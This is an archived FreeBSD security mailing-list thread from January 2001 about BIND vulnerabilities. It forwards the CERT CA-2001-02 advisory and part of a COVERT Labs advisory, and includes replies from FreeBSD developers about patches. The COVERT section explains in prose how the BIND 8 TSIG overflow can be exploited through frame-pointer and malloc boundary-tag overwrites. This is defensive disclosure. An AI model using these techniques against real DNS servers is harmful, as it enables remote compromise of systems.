   Affects:        FreeBSD 3.x prior to the correction date.
                   Ports collection prior to the correction date.
   Corrected:      2000-11-27 (FreeBSD 3.5-STABLE)
                   2001-01-05 (Ports collection)

and then, in Problem description it explains:

   All versions of FreeBSD 3.x prior to the correction date including
   3.5.1-RELEASE are vulnerable to this problem. In addition, the bind8
   port in the ports collection is also vulnerable. FreeBSD 4.x is not
   affected since it contains versions of BIND 8.2.3.

My COMMENT:
-------
This is not true, because 4.0-RELEASE was shipped with
   named 8.2.2-P5-NOESW Mon Mar 20 20:43:54 GMT 2000
   root@monster.cdrom.com:/usr/obj/usr/src/usr.sbin/named
Thus, the statement in the advisory in question might be
at least misleading.

Therefore :
My question:
Is 8.2.2-P5-NOESW (shipped with 4.0-RELEASE) vulnerable to
a) the problem described in FreeBSD-SA-01:10
b) the problem described in CERT Advisory CA-2001-02
   (Multiple Vulnerabilities in BIND), VU#196945 (see that advisory
   at the bottom of this message).

Since 3.5.1-RELEASE was packaged with the same version of bind:
   named 8.2.2-P5-NOESW Thu Jul 20 02:01:19 GMT 2000
   jkh@monster.osd.bsdi.com:/usr/obj/usr/src/usr.sbin/named
I assume the answer to the question a) is "yes".
How about b) ? Also "yes" ?

To the security officers:
http://www.freebsd.org/security/#adv does not show any advisories
on bind, except the one mentioned above.
Will there be any advisory addressing the problem mentioned by the CERT
advisory in regards to the older versions of FreeBSD (and BIND packaged
with them)?

Thanks,

Igor

----- Forwarded message from CERT Advisory -----

[There is text before PGP section.]

-- Start of PGP signed section.

CERT Advisory CA-2001-02 Multiple Vulnerabilities in BIND

Original release date: January 29, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

Domain Name System (DNS) Servers running various versions of ISC BIND
(including both 4.9.x prior to 4.9.8 and 8.2.x prior to 8.2.3; 9.x is
not affected) and derivatives. Because the normal operation of most
services on the Internet depends on the proper operation of DNS
servers, other services could be impacted if these vulnerabilities are
exploited.

Overview

The CERT/CC has recently learned of four vulnerabilities spanning
multiple versions of the Internet Software Consortium's (ISC) Berkeley
Internet Name Domain (BIND) server. BIND is an implementation of the
Domain Name System (DNS) that is maintained by the ISC. Because the
majority of name servers in operation today run BIND, these
vulnerabilities present a serious threat to the Internet infrastructure.

Three of these vulnerabilities (VU#196945, VU#572183, and VU#868916)
were discovered by the COVERT Labs at PGP Security, who have posted an
advisory regarding these issues at

http://www.pgp.com/research/covert/advisories/047.asp

The fourth vulnerability (VU#325431) was discovered by Claudio
Musmarra. The Internet Software Consortium has posted information about
all four vulnerabilities at

http://www.isc.org/products/BIND/bind-security.html

I. Description

VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature
(TSIG) handling code

During the processing of a transaction signature (TSIG), BIND 8 checks
for the presence of TSIGs that fail to include a valid key.
If such a TSIG is found, BIND skips normal processing of the request
and jumps directly to code designed to send an error response. Because
the error-handling code initializes variables differently than in
normal processing, it invalidates the assumptions that later function
calls make about the size of the request buffer. Once these assumptions
are invalidated, the code that adds a new (valid) signature to the
responses may overflow the request buffer and overwrite adjacent memory
on the stack or the heap. When combined with other buffer overflow
exploitation techniques, an attacker can gain unauthorized privileged
access to the system, allowing the execution of arbitrary code.

VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain()

The vulnerable buffer is a locally defined character array used to
build an error message intended for syslog. Attackers attempting to
exploit this vulnerability could do so by sending a specially formatted
DNS query to affected BIND 4 servers. If properly constructed, this
query could be used to disrupt the normal operation of the DNS server
process, resulting in either denial of service or the execution of
arbitrary code.

VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain()

The vulnerable buffer is a locally defined character array used to
build an error message intended for syslog. Attackers attempting to
exploit this vulnerability could do so by sending a specially formatted
DNS query to affected BIND 4 servers. If properly constructed, this
query could be used to disrupt the normal operation of the DNS server
process, resulting in the execution of arbitrary code.

This vulnerability was patched by the ISC in an earlier version of
BIND 4, most likely BIND 4.9.5-P1. However, there is strong evidence to
suggest that some third party vendors who redistribute BIND 4 have not
included these changes in their BIND packages.
Therefore, the CERT/CC recommends that all users of BIND 4 or its
derivatives base their distributions on BIND 4.9.8.

VU#325431 - Queries to ISC BIND servers may disclose environment variables

This vulnerability is an information leak in the query processing code
of both BIND 4 and BIND 8 that allows a remote attacker to access the
program stack, possibly exposing program and/or environment variables.
This vulnerability is triggered by sending a specially formatted query
to vulnerable BIND servers.

II. Impact

VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature
(TSIG) handling code

This vulnerability may allow an attacker to execute code with the same
privileges as the BIND server. Because BIND is typically run by a
superuser account, the execution would occur with superuser privileges.

VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain()

This vulnerability can disrupt the proper operation of the BIND server
and may allow an attacker to execute code with the privileges of the
BIND server. Because BIND is typically run by a superuser account, the
execution would occur with superuser privileges.

VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain()

This vulnerability may allow an attacker to execute code with the
privileges of the BIND server. Because BIND is typically run by a
superuser account, the execution would occur with superuser privileges.

VU#325431 - Queries to ISC BIND servers may disclose environment variables

This vulnerability may allow attackers to read information from the
program stack, possibly exposing environment variables. In addition,
the information obtained by exploiting this vulnerability may aid in
the development of exploits for VU#572183 and VU#868916.

III. History

Since 1997, the CERT/CC has published twelve documents describing
vulnerabilities or exploitation of vulnerabilities in BIND with
information and advice on upgrading and preventing compromises.
Unfortunately, many system and network administrators still have not
upgraded their versions of BIND, making them susceptible to a number of
vulnerabilities.

Prior vulnerabilities in BIND have been widely exploited by intruders.
For example, on November 10, 1999, the CERT/CC published CA-1999-14,
which detailed multiple vulnerabilities in BIND. The CERT/CC continued
to receive reports of compromises based on those vulnerabilities
through December 2000. On April 8, 1998, the CERT/CC published
CA-1998-05; reports of compromises based on the vulnerabilities
described therein continued through November of 1998.

The following graph shows the number of incidents reported to the
CERT/CC regarding BIND NXT record (VU#16532) exploits after the
publication of CA-1999-14:

[Figure: Incidents By Month Involving the BIND NXT Record Vulnerability (VU#16532)]

Based on this past experience, the CERT/CC expects that intruders will
quickly begin developing and using intruder tools to compromise
machines. It is important for IT and security managers to ensure that
their organizations are properly protected before the expected
wide-spread exploitation happens.

Exploitation

The vulnerabilities described in VU#196945, VU#572183, and VU#868916
have been successfully exploited by COVERT Labs in a laboratory
environment. To the best of our knowledge, no exploits have been
released to the public.

IV. Solution

Apply a patch from your vendor

The ISC has released BIND versions 4.9.8 and 8.2.3 to address these
security issues. The CERT/CC recommends that users of BIND 4.9.x or
8.2.x upgrade to BIND 4.9.8, BIND 8.2.3, or BIND 9.1. Because BIND 4 is
no longer actively maintained, the ISC recommends that users affected
by this vulnerability upgrade to either BIND 8.2.3 or BIND 9.1.
Upgrading to one of these versions will also provide functionality
enhancements that are not related to security.
The BIND 4.9.8 and 8.2.3 distributions can be downloaded from

ftp://ftp.isc.org/isc/bind/src/

The BIND 9.1 distribution can be downloaded from

ftp://ftp.isc.org/isc/bind9/

Appendix A contains information supplied by ISC and distributors of
BIND. Depending on your local processes, procedures, and expertise, you
may wish to obtain updates from the ISC or from an operating system
vendor who redistributes BIND.

Use Strong Cryptography to Authenticate Services

Services and transactions that rely exclusively on the DNS system for
authentication are inherently weak. We encourage organizations to use
strong cryptography to authenticate services and transactions where
possible. One common use of strong cryptography is the use of SSL in
authenticating and encrypting electronic commerce transactions over the
web. In addition to this use, we encourage organizations to use SSL,
PGP, S/MIME, SSH, and other forms of strong cryptography to distribute
executable content, secure electronic mail, distribute important
information, and protect the confidentiality of all kinds of data
traversing the Internet.

Use Split Horizon DNS to Minimize Impact

It may also be possible to minimize the impact of the exploitation of
these vulnerabilities by configuring your DNS environment to separate
DNS servers used for the public dissemination of information about your
hosts from the DNS servers used by your internal hosts to connect to
other hosts on the Internet. Frequently, different security policies
can be applied to these servers such that even if one server is
compromised the other server will continue to function normally. Split
horizon DNS configuration may also have other security benefits.
References

To read more about the vulnerabilities described in this document,
please visit the CERT/CC Vulnerability Notes Database:

VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code
http://www.kb.cert.org/vuls/id/196945

VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain()
http://www.kb.cert.org/vuls/id/572183

VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain()
http://www.kb.cert.org/vuls/id/868916

VU#325431 - Queries to ISC BIND servers may disclose environment variables
http://www.kb.cert.org/vuls/id/325431

To cross-reference CERT/CC VU numbers with other vendor documents via
CVE, please visit

VU#196945 - ISC BIND 8 contains buffer overflow in transaction signature (TSIG) handling code
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0010

VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain()
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0011

VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain()
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0013

VU#325431 - Queries to ISC BIND servers may disclose environment variables
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0012

For information on historical issues involving BIND vulnerabilities and
compromises, please visit

CERT Advisory CA-2000-20 Multiple Denial-of-Service Problems in ISC BIND
http://www.cert.org/advisories/CA-2000-20.html

CERT Advisory CA-2000-03 Continuing Compromises of DNS servers
http://www.cert.org/advisories/CA-2000-03.html

CERT Advisory CA-1999-14 Multiple Vulnerabilities in BIND
http://www.cert.org/advisories/CA-1999-14.html

CERT Advisory CA-1998-05 Multiple Vulnerabilities in BIND
http://www.cert.org/advisories/CA-1998-05.html

CERT Advisory CA-1997-22 BIND - The Berkeley Internet Name Daemon
http://www.cert.org/advisories/CA-1997-22.html

CERT Summary CS-2000-02
http://www.cert.org/summaries/CS-2000-02.html

CERT Summary CS-2000-01
http://www.cert.org/summaries/CS-2000-01.html

CERT Summary CS-1999-04
http://www.cert.org/summaries/CS-99-04.html

CERT Summary CS-1998-07
http://www.cert.org/summaries/CS-98.07.html

CERT Summary CS-1998-06
http://www.cert.org/summaries/CS-98.06.html

CERT Summary CS-1998-05
http://www.cert.org/summaries/CS-98.05.html

CERT Summary CS-1998-04
http://www.cert.org/summaries/CS-98.04.html

For more information on transaction signatures, please visit

RFC 2535: Domain Name System Security Extensions
http://www.ietf.org/rfc/rfc2535.txt

RFC 2845: Secret Key Transaction Authentication for DNS (TSIG)
http://www.ietf.org/rfc/rfc2845.txt

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this
advisory. When vendors report new information to the CERT/CC, we update
this section and note the changes in our revision history. If a
particular vendor is not listed below, we have not received their
comments.

Caldera Systems

OpenLinux 2.3, eServer 2.3.1 and eDesktop 2.4 are all vulnerable.
Update packages will be provided at

ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4

Compaq Computer Corporation

COMPAQ COMPUTER CORPORATION
------------------------------------------------------------------------------------
VU#325431 INFOLEAK
------------------------------------------------------------------------------------
Compaq Tru64 UNIX V5.1 and V5.0        *evaluation incomplete
Compaq Tru64 UNIX V4.0D/F/G            *evaluation incomplete
------------------------------------------------------------------------------------
VU#572183 - buffer overflow in nslookupComplain()
VU#868916 - input validation error in nslookupComplain()
------------------------------------------------------------------------------------
Compaq Tru64 UNIX V5.1 and V5.0        - Not Vulnerable
Compaq Tru64 UNIX V4.0D/F/G            - *evaluation incomplete.
------------------------------------------------------------------------------------
VU#196945 - BIND 8 contains buffer overflow in transaction signature handling code
------------------------------------------------------------------------------------
Compaq Tru64 UNIX V5.1 and V5.0        - *evaluation incomplete
Compaq Tru64 UNIX V4.0D/F/G            - Not Vulnerable

* At the time of writing this document, the problems identified are
currently still under evaluation by engineering. Compaq will provide
notice of the completion/availability of the patches through AES
services (DIA, DSNlink FLASH), the ** Security mailing list, and be
available from your normal Compaq Support channel.

**You may subscribe to the Security mailing list at:
http://www.support.compaq.com/patches/mailing-list.shtml

COMPAQ COMPUTER CORPORATION
------------------------------------------------------------------------------------

FreeBSD, Inc.

No supported version of FreeBSD contains BIND 4.x, so this does not
affect us. We currently ship betas of 8.2.3 in the FreeBSD 4.x release
branch, and will be upgrading to 8.2.3 once it is released.

Hewlett-Packard Company

None of the Bind versions of HP-UX is vulnerable to VU#196945 - problem
of buffer overflow in TSIG handling code. HP's Bind 8.1.2 is vulnerable
to VU#325183 (infoleak problem). Bind 4.9.7 is vulnerable to both
VU#572183 (infoleak problem) and VU#325183 (nslookupComplain() buffer
overflow). Fixes are in process.

IBM Corporation

VU#325431 - Queries to ISC BIND servers may disclose environment variables

IBM's AIX operating system may be vulnerable to this "inverse query"
exploitation. We are working to understand the technical nature of this
exploit; when done, we expect to verify AIX's vulnerability. We will
provide updates to this page as we progress [in] studying this exploit.

VU#572183 - ISC BIND 4 contains buffer overflow in nslookupComplain()

IBM's AIX operating system is vulnerable to this potential exploit in
named4.
We are working to fix this quickly and we intend to post an emergency
fix ASAP.

VU#868916 - ISC BIND 4 contains input validation error in nslookupComplain()

IBM's AIX operating system is vulnerable to this potential exploit, and
is working quickly toward a fix.

Sun Microsystems, Inc.

Solaris(tm) versions 2.4, 2.5, 2.5.1 and 2.6 contain revisions of BIND 4
Solaris(tm) versions 7 and 8 contain BIND 8.1.2

Sun is working to address the issues in VU#868916, VU#572183 and
VU#325431 and will be issuing a Sun Security Bulletin when further
information is available. VU#196945 is not present in currently
supported versions of Solaris.

_________________________________________________________________

The CERT/CC thanks the COVERT Labs at PGP Security for discovering and
analyzing three of these vulnerabilities (VU#196945, VU#572183, and
VU#868916) and Claudio Musmarra for discovering the infoleak
vulnerability (VU#325431). We also thank the Internet Software
Consortium for providing patches to fix the vulnerabilities.

_________________________________________________________________

This document was written by Jeffrey P. Lanza, Cory Cohen, Ian Finlay,
and Shawn Hernan.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-02.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
    CERT Coordination Center
    Software Engineering Institute
    Carnegie Mellon University
    Pittsburgh PA 15213-3890
    U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from

http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more
information.

Getting security information

CERT publications and other security information are available from
our web site

http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins,
send email to majordomo@cert.org. Please include in the body of your
message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie Mellon
University makes no warranties of any kind, either expressed or implied
as to any matter including, but not limited to, warranty of fitness for
a particular purpose or merchantability, exclusivity or results
obtained from use of the material. Carnegie Mellon University does not
make any warranty of any kind with respect to freedom from patent,
trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright 2001 Carnegie Mellon University.

Revision History

January 29, 2001: Initial release

-- End of PGP signed section, PGP failed!
----- End of forwarded message from CERT Advisory -----

From owner-freebsd-security Mon Jan 29 9:21:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2342137B402; Mon, 29 Jan 2001 09:21:14 -0800 (PST)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.1/8.11.1) with SMTP id f0THKtB17653; Mon, 29 Jan 2001 12:20:55 -0500 (EST) (envelope-from robert@fledge.watson.org)
Date: Mon, 29 Jan 2001 12:20:55 -0500 (EST)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: Igor Roshchin
Cc: security@freebsd.org, security-officer@freebsd.org, asmodai@freebsd.org
Subject: Re: Bind: FreeBSD-SA-01:10 and CERT Advisory CA-2001-02
In-Reply-To: <200101291629.LAA76025@giganda.komkon.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> To the security officers: http://www.freebsd.org/security/#adv does not
> show any advisories on bind, except the one mentioned above. Will there
> be any advisory addressing the problem mentioned by the CERT advisory in
> regards to the older versions of FreeBSD (and BIND packaged with them)?

I won't attempt to address the other issues in your e-mail, leaving them
to Kris, as I'm not familiar with them, but I can address the concern of
the most recent BIND8 vulnerabilities.

We were made aware of the CERT advisory before its release, but were
waiting for the new 8.2.3 release to be made before importing it into
the tree (the final pre-release did not include the fix, although that's
what is in -STABLE I believe). The release has now been made, and 8.2.3
has been imported into the FreeBSD contrib tree. 5.0-CURRENT now uses
8.2.3 by default as of last night or this morning, and as soon as the
testing is done on 4.2-STABLE, it will be enabled there also. The BIND8
maintainer for FreeBSD has assured me that the integration into -STABLE
will be done sometime this evening, meaning we can push out an advisory
in the next day or so (once testing is done, etc).

Given that the maintainer has also been working on the RELENG_3 branch,
I would imagine that the fix will also be made on that branch. I do not
know what the plans are with regards to RELENG_2.

I will talk to the maintainer about what is involved to assemble
appropriate instructions to upgrade release machines as opposed to
-STABLE branch machines.
As this is a sizable update (import of an entire version of BIND),
those instructions may be non-trivial in length. It may be that we want
to assemble a tarball of the updated files to drop on a 4.2-RELEASE
src/ tree.

Robert N M Watson
FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org
NAI Labs, Safeport Network Services

From owner-freebsd-security Mon Jan 29 9:26:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web1.renley.com (unknown [210.176.231.28]) by hub.freebsd.org (Postfix) with ESMTP id 2583B37B69B; Mon, 29 Jan 2001 09:25:30 -0800 (PST)
Received: from 210.176.231.28 (unverified [203.149.188.102]) by web1.renley.com (Rockliffe SMTPRA 2.1.2) with SMTP id ; Tue, 30 Jan 2001 01:34:00 +0800
Date: Tue, 30 Jan 2001 01:34:00 +0800
Message-ID:
Reply-To: l705723712@yahoo.com
From: l705723712@yahoo.com
To: 20guido@freebsd.org
Subject: (translated from Big5) Madman Info software update info: this batch adds more than 130 discs...... Madman Info software update info Madman Info software update info: this batch adds more than 130 discs... Madman Info software update info: this batch adds more than 130 discs..
MIME-Version: 1.0
Content-Type: text/html; charset=big5
Content-Transfer-Encoding: base64
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

From owner-freebsd-security Mon Jan 29 11:48: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 2EC7037B69E; Mon, 29 Jan 2001 11:47:43 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000) id 8050CBA2AF; Mon, 29 Jan 2001 11:48:09 -0800 (PST)
Date: Mon, 29 Jan 2001 11:48:09 -0800
From: Kris Kennaway To: Igor Roshchin Cc: security@freebsd.org, security-officer@freebsd.org Subject: Re: Bind: FreeBSD-SA-01:10 and CERT Advisory CA-2001-02 Message-ID: <20010129114809.A26160@xor.obsecurity.org> References: <200101291629.LAA76025@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="gKMricLos+KVdGMg" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101291629.LAA76025@giganda.komkon.org>; from str@giganda.komkon.org on Mon, Jan 29, 2001 at 11:29:51AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --gKMricLos+KVdGMg Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Mon, Jan 29, 2001 at 11:29:51AM -0500, Igor Roshchin wrote:
> My COMMENT:
> -------
> This is not true, because 4.0-RELEASE was shipped with
> named 8.2.2-P5-NOESW Mon Mar 20 20:43:54 GMT 2000
> root@monster.cdrom.com:/usr/obj/usr/src/usr.sbin/named
> Thus, the statement in the advisory in question might be
> at least misleading.

Hmm, oops. I'll update it.

> Therefore :
> My question:
> Is 8.2.2-P5-NOESW (shipped with 4.0-RELEASE) vulnerable to
> a) the problem described in FreeBSD-SA-01:10

Sounds like.

> b) the problem described in CERT Advisory CA-2001-02
> (Multiple Vulnerabilities in BIND), VU#196945 (see that advisory
> at the bottom of this message).

No, that's a new problem we found out about a few days ago. Ain't software great? An advisory will be forthcoming.
Kris --gKMricLos+KVdGMg Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dcj5Wry0BWjoQKURAoGTAJ0XvIQC9pEtNG/qTMpLjftt9zb1aACfd0hb 2Es7idLJXMkS0cGNrSiLahY= =Ezy/ -----END PGP SIGNATURE----- --gKMricLos+KVdGMg-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 11:57: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from finch-post-10.mail.demon.net (finch-post-10.mail.demon.net [194.217.242.38]) by hub.freebsd.org (Postfix) with ESMTP id 5874C37B400 for ; Mon, 29 Jan 2001 11:56:34 -0800 (PST) Received: from freebsd.demon.co.uk ([194.222.171.207] helo=chemicalterrorism.com) by finch-post-10.mail.demon.net with esmtp (Exim 2.12 #1) id 14NKP9-000M7r-0A for freebsd-security@freebsd.org; Mon, 29 Jan 2001 19:56:11 +0000 Received: from sycho (sycho.chemicalterrorism.com [192.168.0.2]) by chemicalterrorism.com (Postfix) with SMTP id DCBDFF43D for ; Mon, 29 Jan 2001 19:54:47 +0000 (GMT) 
From: "Si." To: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Mon, 29 Jan 2001 19:55:44 -0000 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <01C089BD.2D821D20@w240.z064220178.sjc-ca.dsl.cnc.net> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi,

Forgive me, but I do try to keep abreast of the various security lists but this is becoming more and more unmanageable. Could someone more knowledgeable in FreeBSD security tell me whether the four vulnerabilities this article discusses have been fixed by

1) The nice people at ISC.
2) The nice people at freebsd-security, i.e. Kris and his team ?

Thanks in advance

Simon Griffiths.
A lonely FreeBSD, MP-RAS, NT, Linux, Win9x, Solaris Admin :-|

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ@SECURITYFOCUS.COM]On Behalf Of COVERT Labs Sent: 29 January 2001 14:32 To: BUGTRAQ@SECURITYFOCUS.COM Subject: [COVERT-2001-01] Multiple Vulnerabilities in BIND

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________

Network Associates, Inc.
COVERT Labs Security Advisory
January 29, 2001

Vulnerabilities in BIND 4 and 8
COVERT-2001-01

______________________________________________________________________

o Synopsis

BIND 8 contains a buffer overflow that allows a remote attacker to execute arbitrary code. The overflow is in the initial processing of a DNS request and therefore does not require an attacker to control an authoritative DNS server. In addition, the vulnerability is not dependent upon configuration options and affects both recursive and non-recursive servers. This vulnerability has been designated as CVE candidate CAN-2001-10.

RISK FACTOR: HIGH

BIND 4 contains a buffer overflow that can allow a remote attacker to execute arbitrary code. The overflow occurs when BIND reports an error while attempting to locate IP addresses for name servers. Exploitation of this vulnerability is restricted by the fact that the target name server must be recursive and that the attacker must have control of an authoritative DNS server. This vulnerability has been designated as CVE candidate CAN-2001-11.

RISK FACTOR: MEDIUM

BIND 4 contains a format string vulnerability that can allow a remote attacker to execute arbitrary code. This vulnerability also occurs when BIND reports an error while attempting to locate IP addresses for name servers, and thus has the same restrictions on exploitation as the buffer overflow. This vulnerability was fixed several versions prior to the current version of BIND 4, but is still present in certain Unix distributions. This vulnerability has been designated as CVE candidate CAN-2001-13.
RISK FACTOR: MEDIUM

______________________________________________________________________

o Vulnerable Systems

BIND 8 versions:
    8.2, 8.2.1
    8.2.2 through to 8.2.2-P7
    8.2.3-T1A through to 8.2.3-T9B

BIND 4 versions:
    buffer overflow - 4.9.5 through to 4.9.7
    format string   - 4.9.3 through to 4.9.5-P1

______________________________________________________________________

o Vulnerability Overview

BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocol distributed by the Internet Software Consortium (www.isc.org). Two versions of BIND distributed by the ISC, BIND version 4 and BIND version 8, are vulnerable to the attacks described in this advisory. The most recent release of BIND, version 9, is not susceptible to these attacks.

BIND version 8 contains a buffer overflow in the implementation of Transaction Signatures (TSIG) for DNS security as defined in RFC 2845. Because the overflow occurs within the initial processing of a DNS request, both recursive and non-recursive DNS servers are vulnerable, independent of the DNS security configuration.

The mechanisms employed by the DNS server make it susceptible to two potential methods of attack. An attacker can perform a stack based buffer overflow, with two important qualifications: first, that the number of bytes past the end of the buffer that the attacker can overwrite is limited in length, and second, that the values of those bytes are mostly fixed. On the x86 architecture, the attacker can manipulate a sufficient number of bytes such that they can modify the saved frame pointer. Overwriting the least significant byte of the saved frame pointer can result in the execution of arbitrary code in certain predictable installations of the name server. The "infoleak" bug, discovered by Claudio Musmarra, and described in CERT advisory CA-2001-02, permits an attacker to remotely retrieve stack frames from named, which allows for direct calculation of the effect of the one byte overflow.
An attacker can also perform a heap overflow, overwriting malloc's internal variables. This method is very effective, though it requires that an operating system's implementation of malloc stores internal data structures in the allocated memory. For this attack to be successful, TCP port 53 must be accessible.

BIND version 4 contains a buffer overflow in a section of code that formulates a warning message for a call to syslog. There are several conditions that can lead to the triggering of this overflow, all of which involve the resolution of NS records into IP addresses. This vulnerability is a standard stack overflow, but the information an attacker is able to present is limited to printable characters. This limitation makes susceptibility to exploitation contingent upon the layout of the named process within memory, and possibly upon the amount of memory available to be allocated by the name server.

In older versions of BIND 4, the previously mentioned call to syslog utilizes a user controllable string as the second argument, which creates an exploitable condition. The same restriction applies, in that the format string is limited to printable characters. Despite this restriction, a remote attacker is still able to create a malicious format string to exploit the vulnerable syslog function call.

______________________________________________________________________

o Detailed Information

The BIND 8 vulnerability is the result of a DNS request utilizing a particular code path that invalidates the logic used to calculate the length of the request buffer. When a request is received, it is either stored in the heap or on the stack, depending on the transport mechanism. Upon receipt of a UDP request, it is read into a 513 byte buffer on the stack called "u.buf" by the function datagram_read(). When a TCP request is received, the message is read by stream_getlen() into a 64k buffer called "sp->s_buf", which is allocated from the heap for every socket.
An interesting feature of BIND is that it uses the incoming buffer of both transport mechanisms to read the request from the network and then modifies it to create an appropriate response. Two key variables are maintained to track the usage of the buffer: one containing the actual length of the data in the buffer, called "msglen", and a second variable "buflen" that tracks the remaining length free in the buffer. When a DNS message is received, msglen is initialized to the length of data received from the network. With a UDP message, this is the amount of data returned by a recvfrom() call, whereas with a TCP message, it is the value provided as the length by the client. buflen is set to the size of the buffer used to read the message (512 for UDP, 64k for TCP).

Under normal circumstances, as BIND processes a request, it appends the answer, authoritative, and additional records to the query. It then modifies the DNS header to reflect these changes and delivers the response. During this processing, msglen will reflect the length of the response as it is being formed, and buflen will be used to track the remaining space available in the buffer. Throughout the processing, BIND assumes that msglen plus buflen will equal the original length of the buffer.

Upon receipt of a DNS message, it is processed as either a request or response based upon the query response flag set in the message header. If a request is received, BIND then determines whether it is a query, iquery, update or notification. Beginning with BIND 8.2, prior to request processing, the additional section of the DNS message is examined for a TSIG resource record. The function ns_find_tsig() is called to perform this functionality as well as to enforce a basic level of validity on the TSIG resource record. If a valid TSIG is identified but an appropriate security key can not be found, an error is signaled and BIND bypasses the normal request processing.
As a result, msglen and buflen remain close to their initial values, instead of being set to their "working" values. BIND processes the request as an error since a TSIG was identified but an appropriate security key was not found. As part of the error generation, BIND reuses the request buffer and appends a TSIG after the question section. At this point, BIND assumes that the size of the request is msglen plus buflen which, under normal circumstances, would be correct. However, in this special case, the request was never processed and "msglen + buflen" is in fact almost twice the size of the original buffer. BIND is then willing to append a TSIG via ns_sign() beyond the limits of the buffer. Since a valid security key was not found, ns_sign() will only append a small number of bytes with limited values. As mentioned above, this makes the vulnerable BIND installation susceptible to two types of attack.

Combining this oversight with the way a compiler positions the stack variables in datagram_read(), it is possible for an attacker to overwrite portions of the saved stack activation records in datagram_read() with certain fixed values. In this case, executing arbitrary code is possible under the x86 architecture by overwriting the saved frame pointer's least significant byte with zero resulting in the saved frame pointer pointing into the original DNS request in the majority of cases. Predicting the effect of this one byte overflow can be difficult as it varies depending upon how BIND was started. However, the "infoleak" bug allows an attacker to retrieve the stack activation record of datagram_read(). This information can then be used to calculate the exact number of bytes that will displace the frame pointer when the least significant byte of the saved ebp is overwritten with 0.

The second method of attack utilizes certain implementations of dynamic memory allocation.
It is possible to overwrite malloc's boundary tags with predictable values, changing the standard libraries' notion of the length of the buffer following the buffer processed in the DNS request. Thus, the next set of boundary information is read from within a buffer that an attacker can control, allowing for a malicious pointer overwrite upon compaction. This technique is applicable to malloc implementations that store linkage information in the actual allocated memory. The following implementations are known by COVERT to be exploitable: IRIX libc, Linux glibc, and Solaris libc.

